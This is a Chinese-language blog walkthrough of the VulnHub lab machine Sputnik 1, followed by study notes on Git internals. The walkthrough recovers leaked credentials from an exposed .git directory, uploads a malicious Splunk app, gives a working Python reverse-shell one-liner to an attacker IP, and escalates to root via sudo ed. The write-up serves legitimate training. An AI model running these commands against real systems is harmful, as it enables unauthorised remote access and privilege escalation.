Spuktnik_1 靶机

Spuktnik_1 靶机

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.130 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:40 EDT
Nmap scan report for 192.168.56.130
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
8089/tcp  open  unknown
55555/tcp open  unknown
61337/tcp open  unknown
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿kali)-[~/Downloads/Sputnik]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.130   
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 09:47 EDT
Nmap scan report for 192.168.56.130
Host is up (0.0011s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 24.37 seconds

开放了三个不常见的TCP端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.130
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:40 EDT
Nmap scan report for 192.168.56.130
Host is up (0.00071s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
8089/tcp  open  unknown
55555/tcp open  unknown
61337/tcp open  unknown
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.73 seconds
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p8089,55555,61337 192.168.56.130
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:41 EDT
Nmap scan report for 192.168.56.130
Host is up (0.00055s latency).

PORT      STATE SERVICE  VERSION
8089/tcp  open  ssl/http Splunkd httpd
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-03-29T11:03:21
|_Not valid after:  2022-03-28T11:03:21
| http-robots.txt: 1 disallowed entry 
|_/
55555/tcp open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Flappy Bird Game
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-git: 
|   192.168.56.130:55555/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
61337/tcp open  http     Splunkd httpd
|_http-server-header: Splunkd
| http-title: Site doesn\'t have a title (text/html; charset=UTF-8).
|_Requested resource was http://192.168.56.130:61337/en-US/account/login?return_to=%2Fen-US%2F
| http-robots.txt: 1 disallowed entry 
|_/
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.70 seconds

每个端口都有对应的 Web 服务,55555 端口有泄露 .git 的情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p8089,55555,61337 192.168.56.130 
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:59 EDT
Nmap scan report for 192.168.56.130
Host is up (0.00075s latency).

PORT      STATE SERVICE
8089/tcp  open  unknown
55555/tcp open  unknown
61337/tcp open  unknown
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 45.10 seconds

漏洞脚本扫描没结果

.git 泄露

简单查看各个 web 界面,发现 55555 端口是个小游戏,8089 是 Splunkd 的管理界面,但是 service 和 serviceNS 都需要登录才能查看,61337 也是需要登录,看起来是后台的正式登录界面

接下来注意力主要放在 .git 目录。

使用工具将其下载到本地查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
┌──(kali㉿kali)-[~/Downloads/Sputnik/GitTools/Dumper]
└─$ ./gitdumper.sh http://192.168.56.130:55555/.git/ clone
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating clone/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[-] Downloaded: config
[-] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[+] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[+] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[+] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/89/9212a811519dd29ee550e163f40560f15107ff
[+] Downloaded: objects/21/b4eb398bdae0799afbbb528468b5c6f580b975
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/dd/b976cde6367cc38a83709b34940c20071c028f
[+] Downloaded: objects/20/395ca0a240b85c4289e06ea59f4cf19d4a7bd6
[+] Downloaded: objects/b4/35a10303be16fe1af8f6c8640f4b9121d3b00e
[+] Downloaded: objects/2b/5f6a83f073daba038f700ead56834c3795f3c2
[+] Downloaded: objects/bd/b0cabc87cf50106df6e15097dff816c8c3eb34
[+] Downloaded: objects/cd/2946ad76b4402e5b3cab9243a9281aad228670
[+] Downloaded: objects/b7/c6a79fd534ed19ab1708ac7a754ca1db28b951
[+] Downloaded: objects/df/45033222b87c64965dce38263e6d5948fb5ec1
[+] Downloaded: objects/ad/295422122860df7d9a4ef0c74de1e6deb67050
[+] Downloaded: objects/4e/007610d905bd04d2779c5eed42baf4882da8d9
[+] Downloaded: objects/8f/260dadbe40cdc656eb43c0c24401bdd4255bd0
[+] Downloaded: objects/ae/d22cd9ee281b5ea70ba1d23b03c4ecb5277581
[+] Downloaded: objects/d3/441572c46f5df5fee247527c91036a000502cd
[+] Downloaded: objects/80/a878bb7c7c26551037e6af8333f1ad331a7fd6
[+] Downloaded: objects/0d/afaf31ba3bc76844127b417191be59d320d705
[+] Downloaded: objects/06/f56474f3bf500c539c738d6bb7093823594d85
[+] Downloaded: objects/b3/8d4f0e65b0bc7044792da436da5d763dc1acd1
[+] Downloaded: objects/6f/749e77927895771fc0c67d2049be7f7ffeb7c0
[+] Downloaded: objects/07/fda135aae22fa7869b3de9e450ff7cacfbc717
[+] Downloaded: objects/ea/cc72595ded7dd95db6045e7d34c989c2b9fc8f
[+] Downloaded: objects/14/9ecc70a312bb6c2e184d9106adb1ab0b91fa49
[+] Downloaded: objects/25/41266769d9ea409ad2e84fce3dd0267ed89a04
[-] Downloaded: objects/f4/385198ce1cab56e0b2a1c55e8863040045b085
[+] Downloaded: objects/99/e27515fca6dcbb65c9146ea4ec08ff86a0d3e0
[+] Downloaded: objects/30/db67474fc60907100c33130930c6a686854f1f
[+] Downloaded: objects/04/5511e6166a080522fea6d3dcb49899d30a9b03
[+] Downloaded: objects/75/c741fdd3e600a3cdf11414beb0c9dab8646466
[+] Downloaded: objects/27/fd90cc337d599e4d93d6ceeced4664426243df
[+] Downloaded: objects/8b/8be7119c795b91424aa237bc91e058a0bffa15
[+] Downloaded: objects/cf/40c32b4b3e714d4616f8721ec54f6f446181a7
[+] Downloaded: objects/31/9b43a0731b8e8278bcb7c2c16f9008cf45c822

然后切换到该目录下,进行查看。首先 git log 查看(显示到 HEAD 所指向的 commit 为止的所有 commit 记录)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
┌──(kali㉿kali)-[~/…/Sputnik/GitTools/Dumper/clone]
└─$ git log                              
commit 21b4eb398bdae0799afbbb528468b5c6f580b975 (HEAD -> master, origin/master, origin/HEAD)
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 21:02:22 2019 +0800

    Update index.html

commit 2b5f6a83f073daba038f700ead56834c3795f3c2
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 20:30:41 2019 +0800

    Update sprite.js

commit 0dafaf31ba3bc76844127b417191be59d320d705
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 20:28:58 2019 +0800

    Delete new file

commit b38d4f0e65b0bc7044792da436da5d763dc1acd1
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 20:28:15 2019 +0800

    Update new file

commit 07fda135aae22fa7869b3de9e450ff7cacfbc717
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 20:27:01 2019 +0800

    Commit new file

commit 2541266769d9ea409ad2e84fce3dd0267ed89a04
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 20:05:22 2019 +0800

    Update README.md

commit 99e27515fca6dcbb65c9146ea4ec08ff86a0d3e0
Author: richagithub <richa09me@gmail.com>
Date:   Mon Aug 14 20:35:42 2017 +0530

    Update README.md

commit 045511e6166a080522fea6d3dcb49899d30a9b03
Author: richagithub <richa09me@gmail.com>
Date:   Wed Apr 13 12:49:26 2016 +0530

    first commit
    
    completed on pc

commit 27fd90cc337d599e4d93d6ceeced4664426243df
Author: richagithub <richa09me@gmail.com>
Date:   Wed Apr 13 12:48:25 2016 +0530

    :space_invader: Added .gitattributes & .gitignore files

commit cf40c32b4b3e714d4616f8721ec54f6f446181a7
Author: richagithub <richa09me@gmail.com>
Date:   Wed Apr 13 14:05:09 2016 +0530

    Initial commit

这里我们可以加上 --raw 参数来得到更全面的信息,git log --raw 输出的格式更加详细,包含了每个提交中所有被修改的文件以及修改的具体行数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
┌──(kali㉿kali)-[~/…/Sputnik/GitTools/Dumper/clone]
└─$ git log --raw
commit 21b4eb398bdae0799afbbb528468b5c6f580b975 (HEAD -> master, origin/master, origin/HEAD)
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 21:02:22 2019 +0800

    Update index.html

:100644 100644 b7c6a79 aed22cd M        index.html

commit 2b5f6a83f073daba038f700ead56834c3795f3c2
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 20:30:41 2019 +0800

    Update sprite.js

:100644 100644 ad29542 d344157 M        sprite.js

commit 0dafaf31ba3bc76844127b417191be59d320d705
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 20:28:58 2019 +0800

    Delete new file

:100644 000000 eacc725 0000000 D        secret

commit b38d4f0e65b0bc7044792da436da5d763dc1acd1
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 20:28:15 2019 +0800

    Update new file

:100644 100644 f438519 eacc725 M        secret

commit 07fda135aae22fa7869b3de9e450ff7cacfbc717
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 20:27:01 2019 +0800

    Commit new file

:000000 100644 0000000 f438519 A        secret

commit 2541266769d9ea409ad2e84fce3dd0267ed89a04
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 20:05:22 2019 +0800

    Update README.md

:100644 100644 75c741f 8f260da M        README.md

commit 99e27515fca6dcbb65c9146ea4ec08ff86a0d3e0
Author: richagithub <richa09me@gmail.com>
Date:   Mon Aug 14 20:35:42 2017 +0530

    Update README.md

:100644 100644 8f260da 75c741f M        README.md

commit 045511e6166a080522fea6d3dcb49899d30a9b03
Author: richagithub <richa09me@gmail.com>
Date:   Wed Apr 13 12:49:26 2016 +0530

    first commit
    
    completed on pc

:000000 100644 0000000 b7c6a79 A        index.html
:000000 100644 0000000 df45033 A        sheet.png
:000000 100644 0000000 ad29542 A        sprite.js

commit 27fd90cc337d599e4d93d6ceeced4664426243df
Author: richagithub <richa09me@gmail.com>
Date:   Wed Apr 13 12:48:25 2016 +0530

    :space_invader: Added .gitattributes & .gitignore files

:000000 100644 0000000 bdb0cab A        .gitattributes
:000000 100644 0000000 cd2946a A        .gitignore

commit cf40c32b4b3e714d4616f8721ec54f6f446181a7
Author: richagithub <richa09me@gmail.com>
Date:   Wed Apr 13 14:05:09 2016 +0530

    Initial commit

:000000 100644 0000000 8f260da A        README.md

使用 --raw 参数可以看到 secret 被创建然后被删除了,尝试使用 git checkout +CommmitId 来将工作目录和索引重置为该提交的内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/…/GitTools/Dumper/clone/_sheet.png.extracted]
└─$ git checkout 07fda135aae22fa7869b3de9e450ff7cacfbc717 
error: unable to read sha1 file of secret (f4385198ce1cab56e0b2a1c55e8863040045b085)
error: invalid object 100644 f4385198ce1cab56e0b2a1c55e8863040045b085 for 'secret'
D       secret
Note: switching to '07fda135aae22fa7869b3de9e450ff7cacfbc717'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

  git switch -c <new-branch-name>

Or undo this operation with:

  git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at 07fda13 Commit new file

出现了错误

应该是文件损坏,再翻看一下 git log 发现了其中包含一个用户名和一个用户邮箱,以及一个 git 用户邮箱 Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>

GitHub 泄露

尝试去 GitHub 搜索该用户,查看其仓库

将其下载到本地

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Downloads/Sputnik]
└─$ git clone https://github.com/ameerpornillos/flappy.git
Cloning into 'flappy'...
remote: Enumerating objects: 65, done.
remote: Total 65 (delta 0), reused 0 (delta 0), pack-reused 65
Receiving objects: 100% (65/65), 31.52 KiB | 424.00 KiB/s, done.
Resolving deltas: 100% (22/22), done.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(kali㉿kali)-[~/Downloads/Sputnik/flappy]
└─$ git checkout 07fda135aae22fa7869b3de9e450ff7cacfbc717     
Note: switching to '07fda135aae22fa7869b3de9e450ff7cacfbc717'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

  git switch -c <new-branch-name>

Or undo this operation with:

  git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at 07fda13 Commit new file


┌──(kali㉿kali)-[~/Downloads/Sputnik/flappy]
└─$ ls -liah
total 52K
1183470 drwxr-xr-x 3 kali kali 4.0K Jul 18 11:04 .
1183326 drwxr-xr-x 5 kali kali 4.0K Jul 18 11:04 ..
1183471 drwxr-xr-x 8 kali kali 4.0K Jul 18 11:04 .git
1183785 -rw-r--r-- 1 kali kali  378 Jul 18 11:04 .gitattributes
1183800 -rw-r--r-- 1 kali kali  649 Jul 18 11:04 .gitignore
1183802 -rw-r--r-- 1 kali kali 7.5K Jul 18 11:04 index.html
1183801 -rw-r--r-- 1 kali kali   26 Jul 18 11:04 README.md
1183806 -rw-r--r-- 1 kali kali   42 Jul 18 11:04 secret
1183803 -rw-r--r-- 1 kali kali  12K Jul 18 11:04 sheet.png
1183804 -rw-r--r-- 1 kali kali 2.1K Jul 18 11:04 sprite.js


┌──(kali㉿kali)-[~/Downloads/Sputnik/flappy]
└─$ cat secret 
sputnik:ameer_says_thank_you_and_good_job

拿到了用户名和密码,尝试登录 61337 端口。

Splunk 后台 getshell

后台如何 Getshell 还是得靠搜索。

点击第一个博客,里面提到了一个 GitHub 开源工具 https://github.com/TBGSecurity/splunk_shells ,将其下载到本地再上传到后台

点击 Manage Apps

上传恶意App

然后会提示重启 Splunk,重新登录后,继续点击 Manage Apps,找到上传的 App Weaponize Splunk for Pentesting and Red Teaming 点击 permissions

给定以上权限,然后提前开启监听,之后在 search 界面,使用以下语句进行反弹 shell:| revshell std IP Port

另一边反弹 shell 成功

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443                  
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.130] 56982
whoami
splunk
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s17: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:d8:0b:51 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.130/24 brd 192.168.56.255 scope global dynamic enp0s17
       valid_lft 553sec preferred_lft 553sec
    inet6 fe80::a00:27ff:fed8:b51/64 scope link 
       valid_lft forever preferred_lft forever
uname -a
Linux sputnik 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
which python
/opt/splunk/bin/python
python -c "import pty;pty.spawn('/bin/bash')"

whoami
^C

一开始反弹的 shell 有问题,交互性提升失败,不过既然有 python,我们可以再反弹一次 shell

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.106",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 444                  
[sudo] password for kali: 
listening on [any] 444 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.130] 52604
splunk@sputnik:/$ whoami
whoami
splunk
splunk@sputnik:/$ id
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
splunk@sputnik:/$ uname -a
uname -a
Linux sputnik 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
splunk@sputnik:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s17: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:d8:0b:51 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.130/24 brd 192.168.56.255 scope global dynamic enp0s17
       valid_lft 600sec preferred_lft 600sec
    inet6 fe80::a00:27ff:fed8:b51/64 scope link 
       valid_lft forever preferred_lft forever

提权

成功。接下来看看 sudo -l 的权限

1
2
3
4
5
6
7
8
9
10
splunk@sputnik:/$ sudo -l
sudo -l
[sudo] password for splunk: ameer_says_thank_you_and_good_job

Matching Defaults entries for splunk on sputnik:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User splunk may run the following commands on sputnik:
    (root) /bin/ed

可以直接以 root 身份使用 ed 命令,那这提权比较简单了,gtfobins 查一查得到

1
2
sudo /bin/ed
!/bin/bash

提权成功

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
splunk@sputnik:/$ sudo /bin/ed
sudo /bin/ed
!/bin/bash
!/bin/bash
root@sputnik:/# cd /root
cd /root
root@sputnik:~# ls -alih
ls -alih
total 28K
131074 drwx------  4 root root 4.0K Mar 29  2019 .
     2 drwxr-xr-x 23 root root 4.0K Mar 29  2019 ..
131075 -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
131077 -r--------  1 root root 1.7K Mar 29  2019 flag.txt
273731 drwxr-xr-x  3 root root 4.0K Mar 29  2019 .local
131076 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
269461 drwx------  2 root root 4.0K Mar 29  2019 .ssh
root@sputnik:~# cat flag.txt
cat flag.txt
 _________________________________________
/ Congratulations!                        \
|                                         |
| You did it!                             |
|                                         |
| Thank you for trying out this challenge |
| and hope that you learn a thing or two. |
|                                         |
| Check the flag below.                   |
|                                         |
| flag_is{w1th_gr34t_p0w3r_c0m35_w1th_gr3 |
| 4t_r3sp0ns1b1l1ty}                      |
|                                         |
| Hope you enjoy solving this challenge.  |
| :D                                      |
|                                         |
\ - ameer (from hackstreetboys)           /
 -----------------------------------------
      \                    / \  //\
       \    |\___/|      /   \//  \\
            /0  0  \__  /    //  | \ \    
           /     /  \/_/    //   |  \  \  
           @_^_@'/   \/_   //    |   \   \ 
           //_^_/     \/_ //     |    \    \
        ( //) |        \///      |     \     \
      ( / /) _|_ /   )  //       |      \     _\
    ( // /) '/,_ _ _/  ( ; -.    |    _ _\.-~        .-~~~^-.
  (( / / )) ,-{        _      `-.|.-~-.           .~         `.
 (( // / ))  '/\      /                 ~-. _ .-~      .-~^-.  \
 (( /// ))      `.   {            }                   /      \  \
  (( / ))     .----~-.\        \-'                 .~         \  `. \^-.
             ///.----..>        \             _ -~             `.  ^-`  ^-_
               ///-._ _ _ _ _ _ _}^ - - - - ~                     ~-- ,.-~
                                                                  /.-~

总结

比较简单的一台机器,主要考察的是 .git 泄露和信息收集的能力,提权是比较常规的手法。不过也发现了自己对于 git 不够熟悉,只是朦朦胧胧有个大概的概念

补充

Git 知识点补充

参考自Git 原理入门 - 阮一峰的网络日志 (ruanyifeng.com)

  • 初始化:git init,在项目根目录下创建一个 .git 子目录,用来保存版本信息。
    • git config –list # 显示当前的Git配置
  • 将文件加入 Git 仓库:git hash-object -w filename
    • 压缩成二进制文件,存入 Git,保存在 .git/objects 目录。
    • 计算当前内容的 SHA1 哈希值(长度为 40 的字符串)
    • 新生成的 Git 对象文件使用计算得到的哈希值作为文件名,哈希值的前两位是目录名,后 38 位是作为文件名
    • 想看二进制文件原始的文本内容,要用 git cat-file 命令
  • 暂存区(index, stage)
    • git update-index 命令用于在暂存区记录一个发生变动的文件。
    • git update-index --add --cacheinfo 100644 <sha1> <path> 用于向 Git 索引添加一个新的文件或更新现有文件的信息。100644 表示文件权限,这里指的是普通文件
    • git status 命令会产生更可读的结果。
  • 上述两个步骤合二为一(保存对象和更新暂存区):git add
    • git add --all 对当前项目所有变动的文件,执行前面的两步操作。
    • 更改 写入 .git/index
  • commit: 相当于生成了当前项目的一个快照,Git 项目可以恢复到任意一个快照
    • 每次提交需要记录是谁提交的,因此建议配置用户名和 Email
    • git config user.name "用户名"
    • git config user.email "Email 地址"
  • 生成目录结构对象并提交说明
    • git write-tree 命令用来将当前的目录结构,生成一个 Git 对象。
    • git commit-tree 命令用于将目录树对象写入版本历史,同时需要加上说明(echo "first commit" | git commit-tree 目录结构对象),最终会生成一个对象
    • git log --stat 版本历史对象
  • branch:虽然我们前面已经提交了快照,但是还没有记录这个快照属于哪个分支。
    • Git 有一个特殊指针 HEAD,总是指向当前分支的最近一次快照。HEAD~6HEAD 之前的第6个快照。
    • 每一个分支指针都是一个文本文件,保存在 .git/refs/heads/ 目录
  • git commit 一步到位:git commit -m "first commit"
    • 当前分支指针移向新创建的快照。
    • git checkout Git对象 切换到某个快照
    • git show Git对象 命令用于展示某个快照的所有代码变动。
  • 自动改写分支指针的命令
    • git commit:当前分支指针移向新创建的快照。
    • git pull:当前分支与远程分支合并后,指针指向新创建的快照。
    • git reset [commit_sha]:当前分支指针重置为指定快照。

常用 Git 命令清单 - 阮一峰的网络日志 (ruanyifeng.com)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# 使用一次新的commit,替代上一次提交
# 如果代码没有任何新变化,则用来改写上一次commit的提交信息
$ git commit --amend -m [message]

# 列出所有本地分支
$ git branch

# 切换到上一个分支
$ git checkout -

# 合并指定分支到当前分支
$ git merge [branch]

# 新建一个分支,并切换到该分支
$ git checkout -b [branch]

# 删除分支
$ git branch -d [branch-name]

# 显示两次提交之间的差异
$ git diff [first-branch]...[second-branch]

# 取回远程仓库的变化,并与本地分支合并
$ git pull [remote] [branch]

# 强行推送当前分支到远程仓库,即使有冲突
$ git push [remote] --force

# 推送所有分支到远程仓库
$ git push [remote] --all

.Git 泄露利用原理

Git 目录文件结构

这里仅列出我们 git 还原时需要的重点目录和文件:

HEAD — 当前 branch 指针。一般指向 refs/heads/ 里的 branch
1
2
3
4
5
6
7
8
9
├── index — 当前branch 项目文件的 map
├── logs — 日志目录
│ ├── HEAD — 日志记录
├── objects — 项目文件目录
│ ├── info — pack文件指针(通常在客户端)
│ └── pack — pack文件目录
└── refs — branch 和 tags 目录
├── heads — 存放各个 branches 的指针
├── stash — 存放 stash文件
1
2
3
4
5
6
7
8
9
10
11
Object(对象) 在 git 中,存储的数据将会保存至 .git/objects 目录下,内容经过 zlib 压缩,并且文件名使用 SHA1 Hash 命名。

Blob(数据对象) 在 git 中,源文件内容在 git 中的表现形式。

Tree object(树对象) 类似于一个目录 map,用于指向 blobs 和其他 tree objects

Commit object(提交对象) 用于指向一个 tree object,并且包含 commit author 和 parent commits

Tag object(标签对象) 用于指向一个 commit object,并且包含一些数据

Reference 用于指向单个 object。通常是一个 commit 或是一个 tag。存放在 .git/refs/ 目录下

一个最简单的 commit 的流程:

  • 当使用 git add . 时,在 objects 下新增一个 blob object; index 文件内容新增一个 blob object 的位置
  • 当使用 git commit 时,在 objects 下新增 tree object 和 commit object,其中指向关系为:refs/heads/master -> commit object -> tree object -> blob object
  • 更新 index 文件
  • 记录 log 日志。日志内容包含 commit object

从git原理角度浅谈.git泄露利用原理-安全客 - 安全资讯平台 (anquanke.com)

knowledge_database > vulnhub
Spuktnik_1 靶机
https://i3eg1nner.github.io/2023/07/b1e4b39f91d9.html
作者
I3eg1nner
发布于
2023年7月19日
许可协议